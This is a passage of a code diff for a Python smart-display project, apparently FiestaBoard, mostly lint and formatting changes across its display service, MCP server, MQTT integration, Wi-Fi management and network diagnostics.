             board_array = text_to_board_array(content_to_send, rows=dims.rows, cols=dims.cols)
 
             success, was_sent = self.vb_client.send_characters(
-                board_array,
-                strategy=strategy,
-                step_interval_ms=interval_ms,
-                step_size=step_size
+                board_array, strategy=strategy, step_interval_ms=interval_ms, step_size=step_size
             )
 
             if success:
@@ -376,16 +381,14 @@ class DisplayService:
                 self._last_active_page_id = active_page_id
                 self._last_silence_mode_active = silence_mode_active
 
-
                 if was_sent:
                     logger.info(f"Active page sent to board: {active_page_id}")
                     self.request_board_refresh()
                 else:
                     logger.debug("Active page unchanged at board level")
                 return was_sent
-            else:
-                logger.error(f"Failed to send active page to board: {active_page_id}")
-                return False
+            logger.error(f"Failed to send active page to board: {active_page_id}")
+            return False
 
         except Exception as e:
             logger.error(f"Error checking active page: {e}")
@@ -533,9 +536,7 @@ class DisplayService:
 
         result = page_service.preview_page(page.id, force_refresh=True)
         if not result or not result.available:
-            logger.warning(
-                "Silence page %s could not be rendered - falling back to indicator", page.id
-            )
+            logger.warning("Silence page %s could not be rendered - falling back to indicator", page.id)
             return self._send_silence_indicator(page.device_type)
 
         settings_service = get_settings_service()
@@ -546,11 +547,7 @@ class DisplayService:
             if page.transition_interval_ms is not None
             else system_transition.step_interval_ms
         )
-        step_size = (
-            page.transition_step_size
-            if page.transition_step_size is not None
-            else system_transition.step_size
-        )
+        step_size = page.transition_step_size if page.transition_step_size is not None else system_transition.step_size
 
         dims = get_dimensions(page.device_type)
         board_array = text_to_board_array(result.formatted, rows=dims.rows, cols=dims.cols)
@@ -582,6 +579,7 @@ class DisplayService:
         """
         try:
             from .plugins.registry import get_plugin_registry
+
             registry = get_plugin_registry()
             trigger_service = get_trigger_service()
 
@@ -600,6 +598,7 @@ class DisplayService:
                 trigger_page_id = plugin.config.get("trigger_page_id")
                 if trigger_page_id:
                     from .pages.service import get_page_service
+
                     page_service = get_page_service()
                     page = page_service.get_page(trigger_page_id)
                     if page and page.type == "template":
@@ -651,15 +650,15 @@ class DisplayService:
             if was_sent:
                 logger.info("Triggered message sent to board")
             return was_sent
-        else:
-            logger.error("Failed to send triggered message to board")
-            return False
+        logger.error("Failed to send triggered message to board")
+        return False
 
     def _get_active_ref_id(self) -> str | None:
         """Return the raw active-page/carousel reference (before carousel resolution)."""
         settings_service = get_settings_service()
         if settings_service.is_schedule_enabled():
             from .time_service import get_time_service
+
             ts = get_time_service()
             now = ts.get_current_time()
             # Pass the first board's ID so schedules scoped to that board are found

--- a/src/mcp_server.py
+++ b/src/mcp_server.py
@@ -60,6 +60,7 @@ logger = logging.getLogger(__name__)
 # string that has to be parsed again.
 # ---------------------------------------------------------------------------
 
+
 def _ok(message: str, **fields: Any) -> dict[str, Any]:
     """Standard success envelope for mutation tools."""
     return {"status": "success", "message": message, **fields}
@@ -79,7 +80,8 @@ def _serialize(obj: Any) -> Any:
     """
     import dataclasses
     from datetime import date, datetime, time
-    if obj is None or isinstance(obj, (str, int, float, bool)):
+
+    if obj is None or isinstance(obj, str | int | float | bool):
         return obj
     if hasattr(obj, "model_dump"):
         return obj.model_dump(mode="json")
@@ -91,11 +93,12 @@ def _serialize(obj: Any) -> Any:
         return [_serialize(x) for x in obj]
     if isinstance(obj, dict):
         return {k: _serialize(v) for k, v in obj.items()}
-    if isinstance(obj, (datetime, date, time)):
+    if isinstance(obj, datetime | date | time):
         return obj.isoformat()
     if hasattr(obj, "__dict__"):
         return {k: _serialize(v) for k, v in vars(obj).items() if not k.startswith("_")}
     return str(obj)
+
 
 # ---------------------------------------------------------------------------
 # Lazy imports — the MCP package is optional; we log a warning if missing
@@ -104,6 +107,7 @@ def _serialize(obj: Any) -> Any:
 
 try:
     from mcp.server.fastmcp import FastMCP  # type: ignore[import-untyped]
+
     _MCP_AVAILABLE = True
 except ImportError:  # pragma: no cover
     _MCP_AVAILABLE = False
@@ -114,7 +118,7 @@ except ImportError:  # pragma: no cover
     )
 
 
-def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
+def _build_mcp_server() -> Any:
     """Construct and return the FastMCP server instance.
 
     Returns ``None`` if the ``mcp`` package is not installed.
@@ -179,7 +183,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
             "  • Formulas:   {{= EXPRESSION }} for Excel-like logic.\n"
             "                Functions include: IF, AND, OR, NOT, UPPER, LOWER,\n"
             "                LEFT, RIGHT, LEN, ROUND, FLOOR, CEIL, MIN, MAX, COLOR.\n"
-            "                Example: {{= IF(weather.temp_f > 80, \"HOT\", \"OK\")}}\n\n"
+            '                Example: {{= IF(weather.temp_f > 80, "HOT", "OK")}}\n\n'
             "SAFETY RULES (please follow strictly)\n"
             "  • NEVER guess API keys, tokens, or credentials. If a plugin needs\n"
             "    one, ask the user to provide it before calling configure_plugin().\n"
@@ -192,7 +196,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
             "  • Color sparingly. A single {{yellow}} or {{green}} tile as a\n"
             "    status indicator reads better than walls of color.\n"
             "  • Reserve row 1 for a title/label and the last row for time or\n"
-            "    context. Use \"\" (empty string) for breathing room and as\n"
+            '    context. Use "" (empty string) for breathing room and as\n'
             "    overflow space for |wrap.\n\n"
             "Available user-invokable PROMPTS: setup_fiestaboard,\n"
             "create_display_page, schedule_my_day, build_a_carousel,\n"
@@ -220,6 +224,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         try:
             from .config_manager import get_config_manager
             from .plugins import get_plugin_registry
+
             registry = get_plugin_registry()
             cm = get_config_manager()
             plugins = registry.list_plugins()
@@ -242,6 +247,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .plugins import get_plugin_registry
+
             registry = get_plugin_registry()
             return _serialize(registry.get_registry_entries())
         except Exception as exc:
@@ -260,13 +266,13 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .plugins import get_plugin_registry
+
             registry = get_plugin_registry()
             registry.install_from_registry(plugin_id)
             if auto_enable:
                 registry.enable_plugin(plugin_id)
             state = "installed and enabled" if auto_enable else "installed (disabled)"
-            return _ok(f"Plugin '{plugin_id}' {state} successfully.",
-                       plugin_id=plugin_id, enabled=auto_enable)
+            return _ok(f"Plugin '{plugin_id}' {state} successfully.", plugin_id=plugin_id, enabled=auto_enable)
         except Exception as exc:
             return _err(f"Error installing plugin '{plugin_id}': {exc}")
 
@@ -279,6 +285,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .plugins import get_plugin_registry
+
             registry = get_plugin_registry()
             registry.enable_plugin(plugin_id)
             return _ok(f"Plugin '{plugin_id}' enabled successfully.", plugin_id=plugin_id)
@@ -296,6 +303,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .plugins import get_plugin_registry
+
             registry = get_plugin_registry()
             registry.disable_plugin(plugin_id)
             return _ok(f"Plugin '{plugin_id}' disabled successfully.", plugin_id=plugin_id)
@@ -315,6 +323,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .plugins import get_plugin_registry
+
             registry = get_plugin_registry()
             registry.uninstall_external_plugin(plugin_id)
             return _ok(f"Plugin '{plugin_id}' uninstalled successfully.", plugin_id=plugin_id)
@@ -339,6 +348,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         try:
             from .config_manager import get_config_manager
             from .plugins import get_plugin_registry
+
             registry = get_plugin_registry()
             cm = get_config_manager()
             existing = cm.get_plugin_config(plugin_id) or {}
@@ -362,6 +372,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .plugins import get_plugin_registry
+
             registry = get_plugin_registry()
             registry.reload_plugin(plugin_id)
             return _ok(f"Plugin '{plugin_id}' updated successfully.", plugin_id=plugin_id)
@@ -379,6 +390,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .plugins import get_plugin_registry
+
             registry = get_plugin_registry()
             return _serialize(registry.get_all_variables())
         except Exception as exc:
@@ -402,6 +414,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .plugins import get_plugin_registry
+
             registry = get_plugin_registry()
             result = registry.fetch_plugin_data(plugin_id)
             return {
@@ -429,6 +442,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .pages.service import get_page_service
+
             svc = get_page_service()
             return _serialize(svc.list_pages())
         except Exception as exc:
@@ -447,6 +461,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .pages.service import get_page_service
+
             svc = get_page_service()
             page = svc.get_page(page_id)
             if page is None:
@@ -485,6 +500,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         try:
             from .pages.models import PageCreate
             from .pages.service import get_page_service
+
             svc = get_page_service()
             data = PageCreate(
                 name=name,
@@ -520,6 +536,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         try:
             from .pages.models import PageUpdate
             from .pages.service import get_page_service
+
             svc = get_page_service()
             data = PageUpdate(
                 name=name,
@@ -545,6 +562,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .pages.service import get_page_service
+
             svc = get_page_service()
             result = svc.delete_page(page_id)
             if not result.success:
@@ -582,6 +600,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .templates.engine import get_template_engine
+
             engine = get_template_engine()
             context = engine._build_context()
             rendered = engine.render_lines(
@@ -614,6 +633,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .schedules.service import get_schedule_service
+
             svc = get_schedule_service()
             return _serialize(svc.list_schedules())
         except Exception as exc:
@@ -642,6 +662,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         try:
             from .schedules.models import ScheduleCreate
             from .schedules.service import get_schedule_service
+
             svc = get_schedule_service()
             data = ScheduleCreate(
                 page_id=page_id,
@@ -682,6 +703,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         try:
             from .schedules.models import ScheduleUpdate
             from .schedules.service import get_schedule_service
+
             svc = get_schedule_service()
             data = ScheduleUpdate(
                 page_id=page_id,
@@ -706,6 +728,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .schedules.service import get_schedule_service
+
             svc = get_schedule_service()
             svc.delete_schedule(schedule_id)
             return _ok(f"Schedule '{schedule_id}' deleted successfully.", schedule_id=schedule_id)
@@ -726,6 +749,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .carousels.service import get_carousel_service
+
             svc = get_carousel_service()
             return _serialize(svc.list_carousels())
         except Exception as exc:
@@ -750,6 +774,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         try:
             from .carousels.models import CarouselCreate
             from .carousels.service import get_carousel_service
+
             svc = get_carousel_service()
             data = CarouselCreate(
                 name=name,
@@ -783,6 +808,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         try:
             from .carousels.models import CarouselUpdate
             from .carousels.service import get_carousel_service
+
             svc = get_carousel_service()
             data = CarouselUpdate(
                 name=name,
@@ -805,6 +831,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .carousels.service import get_carousel_service
+
             svc = get_carousel_service()
             svc.delete_carousel(carousel_id)
             return _ok(f"Carousel '{carousel_id}' deleted successfully.", carousel_id=carousel_id)
@@ -825,6 +852,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         try:
             from .api_server import __version__, _service_running, get_service
             from .plugins import get_plugin_registry
+
             registry = get_plugin_registry()
             plugins = registry.list_plugins()
             service = get_service()
@@ -847,6 +875,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .settings.service import get_settings_service
+
             svc = get_settings_service()
             summary: dict[str, Any] = {}
             for key, fetch in (
@@ -859,7 +888,8 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
                 except Exception as exc:
                     logger.debug(
                         "get_settings_summary: could not fetch %s settings: %s",
-                        key, exc,
+                        key,
+                        exc,
                     )
             return summary
         except Exception as exc:
@@ -876,6 +906,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .config_manager import get_config_manager
+
             cm = get_config_manager()
             cm.set_active_page(page_id)
             return _ok(f"Active page set to '{page_id}'.", page_id=page_id)
@@ -894,6 +925,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """
         try:
             from .schedules.service import get_schedule_service
+
             svc = get_schedule_service()
             svc.set_schedule_enabled(enabled)
             state = "enabled" if enabled else "disabled"
@@ -910,6 +942,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """Live list of all installed plugins with status."""
         try:
             from .plugins import get_plugin_registry
+
             registry = get_plugin_registry()
             plugins = registry.list_plugins()
             lines = [f"# Installed Plugins ({len(plugins)} total)\n"]
@@ -927,6 +960,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """Live list of all pages."""
         try:
             from .pages.service import get_page_service
+
             svc = get_page_service()
             pages = svc.list_pages()
             lines = [f"# Pages ({len(pages)} total)\n"]
@@ -946,13 +980,11 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         try:
             from .board_html_renderer import render_page_preview_html
             from .pages.service import get_page_service
+
             svc = get_page_service()
             page = svc.get_page(page_id)
             if page is None:
-                return (
-                    "<!DOCTYPE html><html><body><p>Page "
-                    f"<code>{page_id}</code> not found.</p></body></html>"
-                )
+                return f"<!DOCTYPE html><html><body><p>Page <code>{page_id}</code> not found.</p></body></html>"
             return render_page_preview_html(page)
         except Exception as exc:
             return f"<!DOCTYPE html><html><body><p>Error: {exc}</p></body></html>"
@@ -962,10 +994,10 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """All template variables from enabled plugins."""
         try:
             from .plugins import get_plugin_registry
+
             registry = get_plugin_registry()
             variables = registry.get_all_variables()
-            lines = ["# Available Template Variables\n",
-                     "Use these in page templates as `{{plugin.variable}}`.\n"]
+            lines = ["# Available Template Variables\n", "Use these in page templates as `{{plugin.variable}}`.\n"]
             for plugin_id, vars_dict in variables.items():
                 lines.append(f"\n## {plugin_id}")
                 for var_name, meta in vars_dict.items():
@@ -982,6 +1014,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """Live list of all scheduled time slots."""
         try:
             from .schedules.service import get_schedule_service
+
             svc = get_schedule_service()
             schedules = svc.list_schedules()
             lines = [f"# Schedules ({len(schedules)} total)\n"]
@@ -989,8 +1022,7 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
                 status = "✓ enabled" if getattr(s, "enabled", True) else "✗ disabled"
                 end = getattr(s, "end_time", None) or "open"
                 lines.append(
-                    f"- **{s.start_time}–{end}** on {s.day_pattern} "
-                    f"→ page `{s.page_id}` ({status}) [`{s.id}`]"
+                    f"- **{s.start_time}–{end}** on {s.day_pattern} → page `{s.page_id}` ({status}) [`{s.id}`]"
                 )
             return "\n".join(lines)
         except Exception as exc:
@@ -1001,16 +1033,14 @@ def _build_mcp_server() -> Any:  # noqa: PLR0915 — large but tabular
         """Live list of all carousels (page playlists)."""
         try:
             from .carousels.service import get_carousel_service
+
             svc = get_carousel_service()
             carousels = svc.list_carousels()
             lines = [f"# Carousels ({len(carousels)} total)\n"]
             for c in carousels:
                 page_count = len(getattr(c, "page_ids", []) or [])
                 interval = getattr(c, "interval_seconds", "?")
-                lines.append(
-                    f"- **{c.name}** (`{c.id}`) — {page_count} pages, "
-                    f"{interval}s per page"
-                )
+                lines.append(f"- **{c.name}** (`{c.id}`) — {page_count} pages, {interval}s per page")
             return "\n".join(lines)
         except Exception as exc:
             return f"Error: {exc}"

--- a/src/mqtt/__init__.py
+++ b/src/mqtt/__init__.py
@@ -19,8 +19,8 @@ from .client import MQTTClient, get_mqtt_client, set_mqtt_client_instance
 from .config import MQTTConfig
 
 __all__ = [
-    "MQTTConfig",
     "MQTTClient",
+    "MQTTConfig",
     "get_mqtt_client",
     "set_mqtt_client_instance",
 ]

--- a/src/mqtt/client.py
+++ b/src/mqtt/client.py
@@ -18,9 +18,11 @@ if TYPE_CHECKING:
 
 logger = logging.getLogger(__name__)
 
+
 # Lazy import so tests can patch before import
 def _get_paho_client():
     import paho.mqtt.client as mqtt_client
+
     return mqtt_client
 
 
@@ -152,6 +154,7 @@ class MQTTClient:
         """Publish all HA discovery messages (retained)."""
         try:
             import src as src_pkg
+
             sw_version = getattr(src_pkg, "__version__", "1.0.0")
         except Exception:
             sw_version = "1.0.0"
@@ -159,6 +162,7 @@ class MQTTClient:
         page_names = None
         try:
             from src.pages.service import get_page_service
+
             pages = get_page_service().list_pages()
             page_names = [p.name for p in pages]
         except Exception:
@@ -229,5 +233,3 @@ def set_mqtt_client_instance(client: Optional["MQTTClient"]) -> None:
     """Set the global MQTT client instance (used by lifespan)."""
     global _mqtt_client_instance
     _mqtt_client_instance = client
-
-

--- a/src/mqtt/commands.py
+++ b/src/mqtt/commands.py
@@ -80,6 +80,7 @@ class CommandHandler:
 
     def _handle_schedule_enabled(self, payload: str) -> None:
         from src.settings.service import get_settings_service
+
         enabled = payload.upper() in ("ON", "1", "TRUE", "YES")
         get_settings_service().set_schedule_enabled(enabled)
 
@@ -95,6 +96,7 @@ class CommandHandler:
             return
         from src.pages.service import get_page_service
         from src.settings.service import get_settings_service
+
         page_service = get_page_service()
         payload_lower = payload.lower()
         for page in page_service.list_pages():
@@ -109,6 +111,7 @@ class CommandHandler:
             return
         from src.board_client import VALID_STRATEGIES
         from src.settings.service import get_settings_service
+
         if payload not in VALID_STRATEGIES:
             logger.warning("MQTT transition_style: invalid %r", payload)
             return
@@ -116,6 +119,7 @@ class CommandHandler:
 
     def _handle_refresh_display(self) -> None:
         from src.api_server import get_service
+
         service = get_service()
         if service and hasattr(service, "check_and_send_active_page"):
             service.check_and_send_active_page()
@@ -124,11 +128,13 @@ class CommandHandler:
 
     def _handle_blank_board(self) -> None:
         from src.api_server import _get_board_client
+
         client = _get_board_client()
         if not client:
             logger.warning("MQTT blank_board: board not configured")
             return
         from src.settings.service import get_settings_service
+
         if not get_settings_service().should_send_to_board():
             return
         blank_array = [[0] * 22 for _ in range(6)]
@@ -140,16 +146,19 @@ class CommandHandler:
         if not payload:
             return
         from src.config import Config
+
         if Config.is_silence_mode_active():
             logger.info("MQTT send_message blocked by silence mode")
             return
         from src.api_server import get_service
         from src.text_to_board import text_to_board_array
+
         service = get_service()
         if not service or not service.vb_client:
             logger.warning("MQTT send_message: service or board not ready")
             return
         from src.settings.service import get_settings_service
+
         settings = get_settings_service()
         transition = settings.get_transition_settings()
         board_array = text_to_board_array(payload)
@@ -171,6 +180,7 @@ class CommandHandler:
         # Clamp to the range defined in the entity (30–3600)
         interval = max(30, min(3600, interval))
         from src.settings.service import get_settings_service
+
         get_settings_service().set_polling_interval(interval)
 
     def _get_current_page_index(self, pages: list, active_id: str | None) -> int:
@@ -184,6 +194,7 @@ class CommandHandler:
         """Navigate to the next page in the page list."""
         from src.pages.service import get_page_service
         from src.settings.service import get_settings_service
+
         page_service = get_page_service()
         settings = get_settings_service()
         pages = page_service.list_pages()
@@ -199,6 +210,7 @@ class CommandHandler:
         """Navigate to the previous page in the page list."""
         from src.pages.service import get_page_service
         from src.settings.service import get_settings_service
+
         page_service = get_page_service()
         settings = get_settings_service()
         pages = page_service.list_pages()

--- a/src/mqtt/config.py
+++ b/src/mqtt/config.py
@@ -31,6 +31,7 @@ class MQTTConfig:
             "Visit" link on the HA device page (e.g. http://192.168.1.50:4420).
             Omitted from discovery payloads when not set.
     """
+
     enabled: bool = False
     broker_host: str = DEFAULT_BROKER_HOST
     broker_port: int = DEFAULT_BROKER_PORT

--- a/src/mqtt/discovery.py
+++ b/src/mqtt/discovery.py
@@ -52,6 +52,7 @@ class EntityDefinition:
         event_types: For event entities, the list of possible event type strings
         json_attributes: Whether this entity publishes JSON attributes alongside state
     """
+
     entity_type: str
     object_id: str
     name: str
@@ -268,7 +269,9 @@ ENTITY_DEFINITIONS: list[EntityDefinition] = [
 ]
 
 
-def build_device_info(config: MQTTConfig, sw_version: str = "1.0.0", configuration_url: str | None = None) -> dict[str, Any]:
+def build_device_info(
+    config: MQTTConfig, sw_version: str = "1.0.0", configuration_url: str | None = None
+) -> dict[str, Any]:
     """Build the HA device info block shared by all entities.
 
     This block appears in every discovery payload and tells HA that all
@@ -435,9 +438,11 @@ def build_all_discovery_messages(
         topic = build_discovery_topic(config, entity)
         payload = build_discovery_payload(config, entity, device_info)
 
-        messages.append({
-            "topic": topic,
-            "payload": json.dumps(payload),
-        })
+        messages.append(
+            {
+                "topic": topic,
+                "payload": json.dumps(payload),
+            }
+        )
 
     return messages

--- a/src/mqtt/state.py
+++ b/src/mqtt/state.py
@@ -139,24 +139,36 @@ class StatePublisher:
 
         if self._prev_silence_mode is not None and self._prev_silence_mode != silence_active:
             event_type = "silence_mode_changed"
-            self.publish_event("settings_changed", event_type, {
-                "active": silence_active,
-                "timestamp": now,
-            })
+            self.publish_event(
+                "settings_changed",
+                event_type,
+                {
+                    "active": silence_active,
+                    "timestamp": now,
+                },
+            )
         self._prev_silence_mode = silence_active
 
         if self._prev_schedule_enabled is not None and self._prev_schedule_enabled != schedule_enabled:
-            self.publish_event("settings_changed", "schedule_toggled", {
-                "enabled": schedule_enabled,
-                "timestamp": now,
-            })
+            self.publish_event(
+                "settings_changed",
+                "schedule_toggled",
+                {
+                    "enabled": schedule_enabled,
+                    "timestamp": now,
+                },
+            )
         self._prev_schedule_enabled = schedule_enabled
 
         if self._prev_display_running is not None and self._prev_display_running != display_running:
-            self.publish_event("settings_changed", "service_toggled", {
-                "running": display_running,
-                "timestamp": now,
-            })
+            self.publish_event(
+                "settings_changed",
+                "service_toggled",
+                {
+                    "running": display_running,
+                    "timestamp": now,
+                },
+            )
         self._prev_display_running = display_running
 
     def _gather_attributes(self) -> dict[str, dict]:
@@ -190,6 +202,7 @@ class StatePublisher:
             import time
 
             from src.api_server import _service_start_time
+
             if _service_start_time is not None:
                 return str(int(time.time() - _service_start_time))
         except Exception:
@@ -201,6 +214,7 @@ class StatePublisher:
         """Get the board API mode (Local API or Cloud API)."""
         try:
             from src.api_server import _get_board_client
+
             client = _get_board_client()
             if client and hasattr(client, "use_cloud"):
                 return "Cloud API" if client.use_cloud else "Local API"
@@ -213,12 +227,10 @@ class StatePublisher:
         """Get the count of active (enabled) plugins."""
         try:
             from src.config_manager import ConfigManager
+
             cm = ConfigManager()
             plugins = cm._config.get("plugins", {})
-            count = sum(
-                1 for p in plugins.values()
-                if isinstance(p, dict) and p.get("enabled", False)
-            )
+            count = sum(1 for p in plugins.values() if isinstance(p, dict) and p.get("enabled", False))
             return str(count)
         except Exception:
             logger.debug("Could not get active plugin count")
@@ -229,10 +241,9 @@ class StatePublisher:
         """Get the current output target setting (ui, board, or both)."""
         try:
             from src.settings.service import get_settings_service
+
             output = get_settings_service().get_output_settings()
             return output.target or "both"
         except Exception:
             logger.debug("Could not get output target")
         return "both"
-
-

--- a/src/network/wifi.py
+++ b/src/network/wifi.py
@@ -19,6 +19,7 @@ and reboots even if the API container is destroyed.
 from __future__ import annotations
 
 import asyncio
+import contextlib
 import logging
 import os
 import shutil
@@ -159,10 +160,7 @@ class WiFiService:
         elif not Path(_DBUS_SOCKET).exists():
             cap = WiFiCapability(
                 available=False,
-                reason=(
-                    "The host D-Bus socket is not mounted into the "
-                    "container; cannot reach NetworkManager."
-                ),
+                reason=("The host D-Bus socket is not mounted into the container; cannot reach NetworkManager."),
             )
         else:
             cap = WiFiCapability(available=True)
@@ -184,7 +182,7 @@ class WiFiService:
         secrets in log messages, and translates failures into ``WiFiError``
         with the stderr message so the API can return a useful response.
         """
-        cmd = ["nmcli"] + args
+        cmd = ["nmcli", *args]
         logger.debug("nmcli: %s", " ".join(_redact_args(cmd)))
         try:
             result = subprocess.run(
@@ -197,9 +195,7 @@ class WiFiService:
         except FileNotFoundError as exc:
             raise WiFiError("nmcli binary not found") from exc
         except subprocess.TimeoutExpired as exc:
-            raise WiFiError(
-                f"nmcli timed out after {timeout}s: {' '.join(_redact_args(cmd))}"
-            ) from exc
+            raise WiFiError(f"nmcli timed out after {timeout}s: {' '.join(_redact_args(cmd))}") from exc
         except subprocess.CalledProcessError as exc:
             stderr = (exc.stderr or "").strip()
             raise WiFiError(stderr or f"nmcli exited with status {exc.returncode}") from exc
@@ -267,9 +263,7 @@ class WiFiService:
         """
         self._require_available()
 
-        active_out = self._run_nmcli(
-            ["-t", "-f", "NAME,TYPE,DEVICE", "connection", "show", "--active"]
-        )
+        active_out = self._run_nmcli(["-t", "-f", "NAME,TYPE,DEVICE", "connection", "show", "--active"])
         active_ssid: str | None = None
         active_name: str | None = None
         for line in active_out.splitlines():
@@ -285,9 +279,7 @@ class WiFiService:
 
         if active_name:
             try:
-                detail = self._run_nmcli(
-                    ["-t", "-f", "IP4.ADDRESS,IP4.GATEWAY", "connection", "show", active_name]
-                )
+                detail = self._run_nmcli(["-t", "-f", "IP4.ADDRESS,IP4.GATEWAY", "connection", "show", active_name])
                 for line in detail.splitlines():
                     parts = self._parse_terse(line)
                     if len(parts) < 2:
@@ -304,16 +296,12 @@ class WiFiService:
             # in-use, which is the active AP. Best-effort — missing signal
             # isn't an error.
             try:
-                scan_out = self._run_nmcli(
-                    ["-t", "-f", "IN-USE,SSID,SIGNAL", "device", "wifi", "list"]
-                )
+                scan_out = self._run_nmcli(["-t", "-f", "IN-USE,SSID,SIGNAL", "device", "wifi", "list"])
                 for line in scan_out.splitlines():
                     parts = self._parse_terse(line)
                     if len(parts) >= 3 and parts[0] == "*" and parts[1] == active_ssid:
-                        try:
+                        with contextlib.suppress(ValueError):
                             signal = int(parts[2])
-                        except ValueError:
-                            pass
                         break
             except WiFiError:
                 pass
@@ -376,9 +364,7 @@ class WiFiService:
     def saved_networks(self) -> list[SavedNetwork]:
         """List persisted wifi profiles (the ones NM will autoconnect)."""
         self._require_available()
-        out = self._run_nmcli(
-            ["-t", "-f", "NAME,TYPE,AUTOCONNECT", "connection", "show"]
-        )
+        out = self._run_nmcli(["-t", "-f", "NAME,TYPE,AUTOCONNECT", "connection", "show"])
         saved: list[SavedNetwork] = []
         for line in out.splitlines():
             parts = self._parse_terse(line)
@@ -417,12 +403,9 @@ class WiFiService:
         async with self._lock:
             # Idempotent delete first — same reasoning as firstboot.sh
             # comment about preventing silent failures on con-name reuse.
-            try:
-                await asyncio.to_thread(
-                    self._run_nmcli, ["connection", "delete", ssid]
-                )
-            except WiFiError:
-                pass  # not found is fine
+            # Not-found is fine.
+            with contextlib.suppress(WiFiError):
+                await asyncio.to_thread(self._run_nmcli, ["connection", "delete", ssid])
 
             add_args = [
                 "connection",
@@ -459,22 +442,14 @@ class WiFiService:
                 # The activation failed (bad password, AP gone). Clean up
                 # the profile we just created so a retry isn't blocked by
                 # the stale entry. Failure of the cleanup itself is non-fatal.
-                try:
-                    await asyncio.to_thread(
-                        self._run_nmcli, ["connection", "delete", ssid]
-                    )
-                except WiFiError:
-                    pass
+                with contextlib.suppress(WiFiError):
+                    await asyncio.to_thread(self._run_nmcli, ["connection", "delete", ssid])
                 raise WiFiError(f"Could not join '{ssid}': {exc}") from exc
 
             confirmed = await asyncio.to_thread(self._run_nm_online)
             status = await asyncio.to_thread(self.status)
 
-        message = (
-            f"Connected to {ssid}."
-            if confirmed
-            else f"Joined {ssid} but could not verify internet connectivity."
-        )
+        message = f"Connected to {ssid}." if confirmed else f"Joined {ssid} but could not verify internet connectivity."
         return WiFiConnectResult(
             status=status,
             connectivity_confirmed=confirmed,
@@ -506,9 +481,7 @@ class WiFiService:
         if not con_name:
             raise WiFiError("Connection name is required")
         async with self._lock:
-            await asyncio.to_thread(
-                self._run_nmcli, ["connection", "delete", con_name]
-            )
+            await asyncio.to_thread(self._run_nmcli, ["connection", "delete", con_name])
 
 
 # Singleton — there's only one NetworkManager per host.

--- a/src/network_diagnostics.py
+++ b/src/network_diagnostics.py
@@ -205,6 +205,7 @@ def check_vestaboard_connection(
 # Troubleshooting recommendations
 # ---------------------------------------------------------------------------
 
+
 def _build_recommendations(results: dict) -> list[dict]:
     """Build user-friendly troubleshooting recommendations based on diagnostics.
 
@@ -226,36 +227,42 @@ def _build_recommendations(results: dict) -> list[dict]:
     # --- DNS ---
     dns = results.get("dns", {})
     if not dns.get("ok", False):
-        recommendations.append({
-            "summary": "FiestaBoard cannot look up addresses on the internet",
-            "steps": [
-                "Make sure the device running FiestaBoard is connected to your Wi-Fi or ethernet.",
-                "Restart your router or modem.",
-                "If the problem persists, try setting your DNS server to 8.8.8.8 or 1.1.1.1 in your router settings.",
-            ],
-        })
+        recommendations.append(
+            {
+                "summary": "FiestaBoard cannot look up addresses on the internet",
+                "steps": [
+                    "Make sure the device running FiestaBoard is connected to your Wi-Fi or ethernet.",
+                    "Restart your router or modem.",
+                    "If the problem persists, try setting your DNS server to 8.8.8.8 or 1.1.1.1 in your router settings.",
+                ],
+            }
+        )
 
     # --- Internet ---
     internet = results.get("internet", {})
     if not internet.get("ok", False):
         if dns.get("ok", False):
             # DNS works but internet doesn't
-            recommendations.append({
-                "summary": "FiestaBoard can look up addresses but cannot reach the internet",
-                "steps": [
